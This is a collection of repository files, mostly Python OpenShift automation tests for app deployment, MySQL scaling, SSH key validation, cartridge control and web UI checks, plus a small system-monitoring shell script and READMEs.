self.steps.append(testcase.TestCaseStep(\n \"Starting the application\",\n common.start_app,\n function_parameters = [ self.app_name, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd ],\n expect_description = \"The application should be started successfully\",\n expect_return = 0))\n\n\n self.steps.append(testcase.TestCaseStep(\n \"Cheking the output of our Django project\",\n common.grep_web_page,\n function_parameters = [self.get_app_url(\"/version/\"), \n \"131final0\", \n \"-H 'Pragma: no-cache'\", 25, 4],\n expect_description = \"The output of your Django project should show the right version number\",\n expect_return = 0))\n\n\n case = testcase.TestCase(self.summary, self.steps)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return 
self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n def get_app_url(self, suffix=\"\"):\n def closure():\n return OSConf.get_app_url(self.app_name)+suffix\n return closure\n\n\n def custom_app_setup(self, remote_download=False):\n tmp_dir = os.path.expanduser(\"~\")\n django_tarball_name = \"django-1.3.1.tar.gz\"\n django_tarball_dir = django_tarball_name.capitalize().replace(\".tar.gz\", \"\")\n django_download_url = \"http://www.djangoproject.com/download/1.3.1/tarball/\"\n if remote_download:\n download_step = [\n \"rm -rf %s/%s\" %(tmp_dir, django_tarball_name),\n \"wget %s -O %s/%s\" % ( django_download_url, tmp_dir, django_tarball_name )\n ]\n else:\n download_step = [\n \"rm -rf %s/%s\" %(tmp_dir, django_tarball_name),\n \"cp %s/app_template/%s %s/%s\" % (WORK_DIR, django_tarball_name, tmp_dir, django_tarball_name)\n ]\n \n app_setup_steps = download_step + [\n \"cd %s\" % ( tmp_dir ),\n \"tar -xvzf %s\" % ( django_tarball_name ),\n \"cd -\",\n \"cp -Rf %s/%s/django/ %s/diy/\" % ( tmp_dir, django_tarball_dir, self.git_repo ),\n \"cp -Rf %s/app_template/django_custom/mydiyapp/ %s/diy/\" % ( WORK_DIR, self.git_repo ),\n \"cp -fv %s/app_template/django_custom/{start,stop} %s/.openshift/action_hooks/\" % ( WORK_DIR, self.git_repo ),\n \"cd %s\" % ( self.git_repo ),\n \"git add .\",\n \"git commit -a -m deployment\",\n \"git push\",\n \"rm -Rfv %s/{D,d}jango*\" % ( tmp_dir ) # cleaning up\n ]\n\n ( ret_code, ret_output) = commands.getstatusoutput(\" && \".join(app_setup_steps))\n print ret_output\n return ret_code\n\n def check_webpage_output(self, app_name, path, pattern, delay = 20):\n app_url = OSConf.get_app_url(app_name)\n return common.grep_web_page( \"http://%s/%s\" % ( app_url, path ), pattern, delay=delay )\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RawCustomized)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5725328326225281, "alphanum_fraction": 0.5779438018798828, "avg_line_length": 31.613445281982422, "blob_id": "1dac37223c2ccadd127ab2fc2f089ee122b55c99", "content_id": "85e1558cef62c0d53e8e28686e4ae27b7b634706", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3881, "license_type": "no_license", "max_line_length": 129, "num_lines": 119, "path": "/automation/open/testmodules/RT/scaling/perl_scaling_mysql.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nimport common\nimport OSConf\nimport rhtest\nimport fileinput\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.info(\"[US2004][Runtime][rhc-cartridge]Embed mysql to scalable apps: perl\")\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_name = 'myperl' + common.getRandomString()\n self.app_type = common.app_types[\"perl\"]\n \n common.env_setup()\n\n def finalize(self):\n pass\n\n\nclass PerlScalingMysql(OpenShiftTest):\n def check_mysql_result(self):\n app_url = OSConf.get_app_url(self.app_name)\n 
return common.grep_web_page(\"http://%s/mysql.pl\" % app_url, \"Tim Bunce, Advanced Perl DBI\", \"-H 'Pragma: no-cache'\", 5, 4)\n\n def test_method(self):\n self.add_step(\n \"Create a scalable %s app: %s\" % (self.app_type, self.app_name),\n common.create_scalable_app,\n function_parameters = [self.app_name, self.app_type, self.user_email, self.user_passwd, True],\n expect_description = \"App should be created successfully\",\n expect_return = 0)\n\n self.add_step(\n \"embed mysql to %s\" % self.app_name,\n common.embed,\n function_parameters = [ self.app_name, \"add-\" + common.cartridge_types[\"mysql\"], self.user_email, self.user_passwd ],\n expect_return = 0)\n\n self.add_step(\n \"Copy template files\",\n \"cp %s/cartridge/app_template/mysql/mysql.pl %s/perl/mysql.pl\" % (WORK_DIR + \"/../\", self.app_name),\n expect_description = \"Operation must be successfull\",\n expect_return = 0)\n\n self.add_step(\n \"git push codes\",\n \"cd %s && git add . && git commit -am 'update app' && git push\" % self.app_name,\n expect_return = 0)\n\n self.add_step(\n \"Check MySql Result\",\n self.check_mysql_result,\n expect_description = \"MySQL operation must be successfull\",\n expect_return = 0)\n\n self.add_step(\n \"Scale-up the application via Rest API\",\n common.scale_up,\n function_parameters = [self.app_name,],\n expect_description = \"Operation must be successfull\",\n expect_return = 0,\n try_count=3)\n\n for i in range(1,4):\n self.add_step(\n \"Check MySql Result - %d\" % i,\n self.check_mysql_result,\n expect_description = \"MySQL operation must be successfull\",\n expect_return = 0)\n\n self.add_step(\n \"Scale-down the application via Rest API\",\n common.scale_down,\n function_parameters = [self.app_name,],\n expect_description = \"Operation must be successfull\",\n expect_return = 0,\n try_interval=5,\n try_count=6)\n\n self.add_step(\n \"Check MySql Result - again\",\n self.check_mysql_result,\n expect_description = \"MySQL operation must be successfull\",\n expect_return = 0)\n\n self.add_step(\n \"Remove mysql from %s\" % self.app_name,\n common.embed,\n function_parameters = [ self.app_name, \"remove-\" + common.cartridge_types[\"mysql\"] ],\n expect_description = \"Operation must be successfull\",\n expect_return = 0)\n\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PerlScalingMysql)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.521228551864624, "alphanum_fraction": 0.5273261070251465, "avg_line_length": 38.53571319580078, "blob_id": "23ef1e961339e5b181831ad55da2fdf3990f5aeb", "content_id": "6d0ee5322e97f7d89b493af1520bca050a826e80", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4428, "license_type": "no_license", "max_line_length": 145, "num_lines": 112, "path": "/automation/open/testmodules/RT/client/add_sshkey_with_invalid_keyname.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = os.environ[\"OPENSHIFT_user_email\"]\n self.user_passwd = 
os.environ[\"OPENSHIFT_user_passwd\"]\n self.key_filename=\"my_testing_second_key\"\n self.key_filename2=\"my_testing_second_key2\"\n self.key_filename3=\"my_testing_second_key3\"\n self.new_keyname=\"second\"\n self.invalid_keyname=\"*%^+\"\n tcms_testcase_id = 129354\n self.steps_list = []\n common.env_setup()\n\n def finalize(self):\n pass\n\n\nclass AddSshKeyWithInvalidKeyname(OpenShiftTest):\n def cleanup(self):\n os.system(\"rm -f %s*\" % (self.key_filename))\n common.remove_sshkey(self.new_keyname, self.user_email, self.user_passwd)\n\n def test_method(self):\n self.steps_list.append( testcase.TestCaseStep(\"Just for sure from previus testing... - remove that key\",\n self.cleanup,\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\"Create additional key\" ,\n \"ssh-keygen -t dsa -f %s -N '' \" % self.key_filename,\n expect_return=0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\"Add this key to openshift\" ,\n common.add_sshkey,\n function_parameters=[\"%s.pub\" % (self.key_filename), self.new_keyname, self.user_email, self.user_passwd],\n expect_return=0\n ))\n #this key shouldn't be added, because of\n self.steps_list.append(testcase.TestCaseStep(\"Create 2nd additional key\" ,\n \"ssh-keygen -t dsa -f %s -N '' \" % self.key_filename2,\n expect_return=0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\"Add second key this key to openshift\" ,\n common.add_sshkey,\n function_parameters=[\"%s.pub\" % (self.key_filename2), self.new_keyname, self.user_email, self.user_passwd],\n expect_description=\"Should fail, because of duplicates\",\n expect_return=\"!0\",\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\"Add second key this key to openshift with invalid key-name\" ,\n common.add_sshkey,\n function_parameters=[\"%s.pub\" % (self.key_filename2), self.invalid_keyname, self.user_email, self.user_passwd],\n expect_description=\"Should fail, because of invalid keyname\",\n expect_return=\"!0\",\n ))\n\n\n #check for the key type\n self.steps_list.append(testcase.TestCaseStep(\"Create additional fake key\",\n \"echo 'key' >%s.pub \" % self.key_filename3,\n expect_return=0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\"Add this key to openshift\" ,\n common.add_sshkey,\n function_parameters=[\"%s.pub\" % (self.key_filename3), \"fake\", self.user_email, self.user_passwd],\n expect_return=\"!0\",\n ))\n\n case = testcase.TestCase(\"[US1652][UI][CLI]add a ssh key with invalid or existing key-name\",\n steps=self.steps_list\n )\n\n case.add_clean_up(self.cleanup)\n\n case.run()\n\n\tif case.testcase_status == 'PASSED':\n\t return self.passed(\"%s passed\" % self.__class__.__name__)\n\tif case.testcase_status == 'FAILED':\n\t return self.failed(\"%s failed\" % self.__class__.__name__)\n\t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AddSshKeyWithInvalidKeyname)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6134669184684753, "alphanum_fraction": 0.6281453967094421, "avg_line_length": 33.88617706298828, "blob_id": "a200785272d7e7cbb7a94fd40a0b9e3e21398a53", "content_id": "d3477acd6931ca3a59c30883681ddd5223c37b9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4292, "license_type": "no_license", "max_line_length": 212, "num_lines": 123, "path": "/automation/open/testmodules/UI/web/case_138622.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": 
"#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_138622.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CheckAppGetstartedPage(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.login()\n \n #create a python app\n #web.create_app(\"python-2.6\",\"python2\")\n web.go_to_create_app(\"python-2.6\")\n web.input_by_id(\"application_name\", \"python2\")\n web.click_element_by_id(\"application_submit\")\n time.sleep(5)\n web.assert_text_equal_by_xpath('''Your application has been created. If you're new to OpenShift check out these tips for where to go next.''', '''//div[@id='content']/div/div/div/div[2]/div/section/p''') \n\n #check wether the links are correct\n time.sleep(5)\n\n #check the \"Git version control system\" link\n web.assert_element_present_by_link_text(\"Git version control system\") \n \n #check the \"Learn more about uploading code\" link\n web.click_element_by_link_text(\"Learn more about uploading code\")\n time.sleep(5)\n web.assert_text_equal_by_xpath('''2.5. Editing and Deploying Applications''','''//h2[@id='sect-User_Guide-OpenShift_Web_Interface-Editing_and_Deploying_Applications']''')\n web.go_back()\n\n #check the \"Add a cartridge\" link\n web.click_element_by_link_text(\"Adding a cartridge\")\n time.sleep(3)\n web.assert_text_equal_by_xpath('''ADD A CARTRIDGE''','''//div[@id='content']/div/div/div/div/div/nav/ul/li[3]''')\n web.go_back()\n\n #check the \"Mysql\" link\n web.click_element_by_link_text(\"MySQL\")\n time.sleep(3)\n web.check_title(\"Add a Cartridge | OpenShift by Red Hat\")\n web.go_back()\n\n #check the \"MongoDB\" link\n web.click_element_by_link_text(\"MongoDB\")\n time.sleep(3)\n web.check_title(\"Add a Cartridge | OpenShift by Red Hat\")\n web.go_back()\n\n #check the \"Add a cartridge to your application now\" link\n web.click_element_by_link_text(\"Add a cartridge to your application now\")\n time.sleep(3)\n web.assert_text_equal_by_xpath('''ADD A CARTRIDGE''','''//div[@id='content']/div/div/div/div/div/nav/ul/li[3]''')\n web.go_back()\n\n #check the \"Follow these steps to install the client\" link\n web.click_element_by_link_text(\"Follow these steps to install the client\")\n time.sleep(3)\n web.assert_text_equal_by_xpath('''Get Started with OpenShift''','''//div[@id='content']/div/div/div/div/div/h1''')\n web.go_back()\n\n #check the \"on how to manage your application from the command line\" link\n web.click_element_by_link_text(\"on how to manage your application from the command line\")\n time.sleep(3)\n web.check_title(\"Chapter 3. 
OpenShift Command Line Interface - Red Hat Customer Portal\")\n web.go_back()\n\n #check the \"JBoss Developer Studio tools page.\" link\n web.click_element_by_link_text(\"JBoss Developer Studio tools page.\")\n time.sleep(5)\n web.assert_text_equal_by_xpath('''OpenShift Client Tools''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''',\"Jboss Develop center is missing\")\n web.go_back()\n\n #check the \"application overview page\" link\n web.click_element_by_link_text('''application overview page''')\n time.sleep(3)\n web.assert_text_equal_by_xpath('''PYTHON2''','''/html/body/div/div/div/div/div/div/nav/ul/li[2]/a''')\n web.go_back()\n \n #delete a python app\n web.delete_last_app(\"python2\")\n\n\n self.tearDown()\n\n return self.passed(\" case_138622--CheckAppGetstartedPage passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CheckAppGetstartedPage)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_138622.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.39534884691238403, "alphanum_fraction": 0.39534884691238403, "avg_line_length": 42, "blob_id": "bbd81d61a3fca4c0d61cbdeeccc443396d4268f9", "content_id": "a658c4430ff47135c074d6997be55948e1445e96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 86, "license_type": "no_license", "max_line_length": 42, "num_lines": 2, "path": "/python-simple-cmd/README.md", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "This is a simple cmd app powered by python\n==========================================\n" }, { "alpha_fraction": 0.46860355138778687, "alphanum_fraction": 0.4901593327522278, "avg_line_length": 27.078947067260742, "blob_id": "369a5922932f97deb58ff84805b460f5b957adf1", "content_id": "a0bea3747b1fca150ce51af0f26d16fe64a0dd42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1067, "license_type": "no_license", "max_line_length": 88, "num_lines": 38, "path": "/automation/open/Longevity/record.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/sh\nstart_time=`date +%Y%m%d-%H%M%S`\nrootdev=`df -h|grep /dev/sda|awk '{print $1}'|cut -d/ -f 3`\n\n\ttime=`date +%Y%m%d-%H%M%S`\n\techo \"time: $time\"\n\techo \"\"\n\techo \"===========================Start ========= record===============================\"\n\techo \"****** 1. Filesystem info: ******\"\n\tdf -h|grep -B1 \"/$\"\n\techo\n\techo \"****** 2. MEMORY info: ******\"\n\t free -m |grep \"buffers\\/cache\"\n\techo \"\"\n\techo \"****** 3. Vmstat info: ******\"\n\techo\n\tvmstat 1 3\n\t#vmstat 1 3|tee -a vmstat-$start_time.log \n\techo\n\techo \"****** 4. Cpu consume top 3: ******\"\n\tps auxw|head -1;ps auxw|sort -rn -k3|head -3\n\techo\n\techo \"****** 5. Mem consume top 3: ******\"\n\techo\n\tps auxw|head -1;ps auxw|sort -rn -k4|head -3\n\techo\n\techo \"****** 6. Mongo and apache ******\"\n\techo\n\tpstree |egrep 'mongo|httpd'\n\techo\n\tpstree |grep mongod>/dev/null\n\tif [ $? -eq 0 ];then\n\techo \"****** 7. 
Mongo fds number ******\"\n\techo \"Mongo process fds: (/proc/`pidof mongod`/fd/)\"\n\tls /proc/`pidof mongod`/fd/|wc -l\n\techo\n\tfi\n\techo \"===========================End ========= record===============================\"\n" }, { "alpha_fraction": 0.49597424268722534, "alphanum_fraction": 0.5058373808860779, "avg_line_length": 38.11023712158203, "blob_id": "404bc0a376165c5054c6caf19004377c1e1449c2", "content_id": "7a261ff9ca3e22aac6b8548c05edf9960bf6e82d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4968, "license_type": "no_license", "max_line_length": 144, "num_lines": 127, "path": "/automation/open/testmodules/RT/cartridge/metrics_control_embedded_cartridge.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nMichal Zimen\[email protected]\nSept 24, 2012\n\n[US2105][US2110][US1386][[Runtime][cartridge]Control embedded Metrics\nhttps://tcms.engineering.redhat.com/case/167565/?from_plan=4962\n\"\"\"\n\nimport common\nimport rhtest\nimport OSConf\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = '[US1386][Runtime][cartridge]Control embedded Metrics'\n \n try:\n test_name = self.get_variant()\n except:\n self.info(\"WARN: Missing variant, used `php` as default\")\n test_name = 'php'\n\n self.info(\"VARIANT: %s\"%test_name)\n self.app_type = common.app_types[test_name]\n self.app_name = common.getRandomString(10)\n\n common.env_setup()\n\n def finalize(self):\n pass\n\nclass MetricsControlEmbededCartridge(OpenShiftTest):\n def verify(self, str2verify):\n url = OSConf.get_app_url(self.app_name)+\"/metrics/\"\n return common.grep_web_page(url, str2verify)\n\n def test_method(self):\n self.add_step(\"Creating an application\",\n common.create_app,\n function_parameters = [ self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, False ],\n expect_description = 'The app should be created successfully',\n expect_return = 0)\n\n self.add_step('Embedding Metrics to the application',\n common.embed,\n function_parameters = [ self.app_name, \n 'add-%s' % ( common.cartridge_types['metrics']), \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd ],\n expect_description = 'Metrics cartridge should be embedded successfully',\n expect_return = 0)\n\n self.add_step(\n 'Ensuring the web page is available',\n self.verify,\n function_parameters = [ \"App Resource Data\"],\n expect_description = 'Metrics should be started',\n expect_return = 0)\n\n\n self.add_step(\n 'Stopping Metrics',\n 'rhc cartridge stop %s -a %s -l %s -p %s %s' % ( common.cartridge_types['metrics'], \n self.app_name,\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = 'Metrics should be stopped',\n expect_return = 0)\n\n self.add_step(\n 'Ensuring the app is not available',\n self.verify,\n function_parameters = [\"Service Temporarily\"],\n expect_description = 'Metrics should be stopped',\n expect_return = 0 )\n\n self.add_step(\n 'Restarting Metrics',\n \"rhc cartridge restart %s -a %s -l %s -p '%s' %s\" % ( common.cartridge_types['metrics'], \n self.app_name,\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = 'Metrics should be started',\n expect_return = 0)\n\n self.add_step(\n 'Ensuring the right status message of the started instance',\n self.verify,\n 
function_parameters = [\"App Resource Data\"],\n expect_description = 'Metrics should be started',\n try_count=3,\n try_interval=10,\n expect_return = 0)\n\n self.add_step(\n 'Removing Metrics cartridge',\n \"rhc cartridge remove %s -a %s -l %s -p '%s' --confirm %s\" % ( common.cartridge_types['metrics'],\n self.app_name,\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = 'The Metrics cartridge should be removed',\n expect_return = 0)\n\n self.run_steps()\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(MetricsControlEmbededCartridge)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.576773464679718, "alphanum_fraction": 0.583256185054779, "avg_line_length": 33.38853454589844, "blob_id": "37bff30a32a254c2ad33b72ebc820cf9945269f4", "content_id": "e08ddd18360a571d8bf2fa35af734d029c7c9953", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5399, "license_type": "no_license", "max_line_length": 134, "num_lines": 157, "path": "/automation/open/testmodules/RT/scaling/nodejs_mysql_scaling.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nimport common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\nimport fileinput\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.info(\"[US2006][Runtime][rhc-cartridge]Embed mysql to scalable apps: nodejs\")\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_name = 'nodejs' + common.getRandomString()\n self.app_type = common.app_types[\"nodejs\"]\n self.random1 = common.getRandomString(10)\n \n common.env_setup()\n\n\n def finalize(self):\n pass\n\nclass NodejsScalingMysql(OpenShiftTest):\n\n def fill_mysql(self):\n time.sleep(20)\n app_url = OSConf.get_app_url(self.app_name)\n common.fetch_page(\"%s/data1.js\"% app_url)\n common.fetch_page(\"%s/data1.js\"% app_url)\n return 0\n\n def check_mysql_result(self, s_pattern):\n app_url = OSConf.get_app_url(self.app_name)\n url = \"%s/show.js\"% app_url\n return common.grep_web_page(url, s_pattern, delay=5, count=4)\n\n def update_mysql_credentials(self):\n'''\n mysql = OSConf.get_embed_info(self.app_name, common.cartridge_types['mysql'])\n \n self.info(\"mysql credentials: %s\"%mysql)\n\n try:\n self.info(\"Copy/modify template files\")\n fr = open(\"%s/../cartridge/app_template/mysql/server.js\"%WORK_DIR, 'r')\n s = fr.read()\n fr.close()\n\n s = s.replace(\"#mysql_host#\", mysql['url'])\n s = s.replace(\"#mysql_port#\", mysql['port'])\n s = s.replace(\"#mysql_user#\", mysql['username'])\n s = s.replace(\"#mysql_passwd#\", mysql['password'])\n s = s.replace(\"#mysql_dbname#\", mysql['database'])\n s = s.replace(\"#str_random1#\", self.random1)\n s = s.replace(\"#str_random2#\", self.random1)\n\n fw = open(\"./%s/server.js\" % self.app_name, 'w')\n fw.write(s)\n fw.close()\n except Exception as e:\n self.error(e)\n return False\n'''\n return True\n\n def test_method(self):\n self.add_step(\"Create a 
scalable %s app: %s\" % (self.app_type, self.app_name),\n common.create_app,\n function_parameters = [self.app_name, self.app_type, self.user_email, self.user_passwd, True, \"./\" + self.app_name, True],\n expect_description = \"App should be created successfully\",\n expect_return = 0)\n\n self.add_step(\"embed mysql to %s\" % self.app_name,\n common.embed,\n function_parameters = [ self.app_name, \"add-\" + common.cartridge_types[\"mysql\"], self.user_email, self.user_passwd ],\n expect_return = 0)\n\n self.add_step(\"Changing MySQL credentials\",\n self.update_mysql_credentials,\n expect_description = \"Operation must be successfull\",\n expect_return = True)\n\n self.add_step(\"git push codes\",\n \"cd %s && git add . && git commit -am 'update app' && git push\" % self.app_name,\n expect_return = 0)\n\n self.add_step(\"Pollute data into MySql\",\n self.fill_mysql,\n expect_description = \"MySQL operation must be successfull\",\n expect_return = 0)\n\n self.add_step(\"Check MySql Result\",\n self.check_mysql_result,\n function_parameters = [self.random1],\n expect_description = \"MySQL operation must be successfull\",\n expect_return = 0)\n \n self.add_step(\"Scale-up the application via Rest API\",\n common.scale_up,\n function_parameters = [ self.app_name,],\n expect_description = \"Operation must be successfull\",\n expect_return = 0)\n \n for i in range(1,4):\n self.add_step(\"Check MySql Result - again\",\n self.check_mysql_result,\n function_parameters = [self.random1],\n expect_description = \"MySQL operation must be successfull\",\n expect_return = 0)\n\n self.add_step(\"Scale-down the application via Rest API\",\n common.scale_down,\n function_parameters = [ self.app_name,],\n expect_description = \"Operation must be successfull\",\n expect_return = 0,\n try_interval=5,\n try_count=6)\n\n self.add_step(\"Check MySql Result - again\",\n self.check_mysql_result,\n function_parameters = [self.random1],\n expect_description = \"MySQL operation must be successfull\",\n expect_return = 0)\n\n self.add_step(\"Remove mysql from %s\" % self.app_name,\n common.embed,\n function_parameters = [ self.app_name, \"remove-\" + common.cartridge_types[\"mysql\"] ],\n expect_description = \"Operation must be successfull\",\n expect_return = 0)\n\n self.run_steps()\n return self.passed(\"%s passed\" % self.__class__.__name__)\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(NodejsScalingMysql)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6064879894256592, "alphanum_fraction": 0.6304654479026794, "avg_line_length": 29.483871459960938, "blob_id": "95c8f58266f9b82cb28c607b87bef8c215b3bcc5", "content_id": "67165966dc63c10a3dbc53f0777fdb39ee6bf23c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2836, "license_type": "no_license", "max_line_length": 211, "num_lines": 93, "path": "/automation/open/testmodules/UI/web/case_180947.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_180947.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass AddAllCartridgeToRubyOnRailsApp(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.login()\n\n #create a jbosseap app\n 
##web.create_app(\"rails\",\"rubyonrails\")\n web.go_to_create_app(\"rails\")\n web.input_by_id(\"application_name\", \"rubyonrails\")\n web.click_element_by_id(\"application_submit\")\n time.sleep(40)\n web.assert_text_equal_by_xpath('''Your application has been created. If you're new to OpenShift check out these tips for where to go next.''', '''//div[@id='content']/div/div/div/div[2]/div/section/p''')\n \n #go to app rubyonrails page and add cartridges\n web.add_cartridge(\"rubyonrails\", \"mongodb-2.2\")\n time.sleep(8)\n web.assert_text_equal_by_xpath(\"rhc app cartridge remove -a rubyonrails -c mongodb-2.2\",'''//pre[3]''') \n\n web.add_cartridge(\"rubyonrails\", \"cron-1.4\")\n web.assert_text_equal_by_xpath(\"Cron 1.4\",'''//div[@id='cartridge_type_']/h3''')\n\n\n web.add_cartridge(\"rubyonrails\",\"metrics-0.1\")\n web.assert_text_equal_by_xpath(\"OpenShift Metrics 0.1\",'''//div[@id='cartridge_type_']/h3''')\n\n web.add_cartridge(\"rubyonrails\",\"phpmyadmin-3.4\")\n web.assert_text_equal_by_xpath(\"phpMyAdmin 3.4\",'''//div[@id='cartridge_type_']/h3''')\n\n web.add_cartridge(\"rubyonrails\",\"rockmongo-1.1\")\n web.assert_text_equal_by_xpath(\"RockMongo 1.1\",'''//div[@id='cartridge_type_']/h3''')\n\n web.go_to_app_detail(\"rubyonrails\")\n web.click_element_by_xpath('''//a[contains(@href, '/building')]''')\n time.sleep(3)\n web.input_by_id(\"application_name\", \"jenkins\")\n web.click_element_by_id(\"application_submit\")\n time.sleep(150) \n web.assert_text_equal_by_xpath(\"Building your Application\",'''//div[@id='content']/div/div/div/div[2]/div/h1''')\n\n\n\n #delete a rubyonrails app\n web.delete_app(\"rubyonrails\")\n #delete a jenkins app\n web.delete_last_app(\"jenkins\")\n\n\n self.tearDown()\n\n return self.passed(\" case_180947--AddAllCartridgeToRubyOnRailsApp passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AddAllCartridgeToRubyOnRailsApp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_180947.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6425855755805969, "alphanum_fraction": 0.6692014932632446, "avg_line_length": 19.91666603088379, "blob_id": "d81907d897e183e0ffe5b8795cb67004d3f0d6ed", "content_id": "449047c0d1be16690ab9cafd51985ada975a5b66", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 293, "license_type": "no_license", "max_line_length": 53, "num_lines": 12, "path": "/sblog/README.md", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "Django-Simple-Blog\r\n==================\r\n\r\nsimple-Blog dajngo版\r\n\r\n使用的环境: fedora 17 + django1.4 + python2.7 + 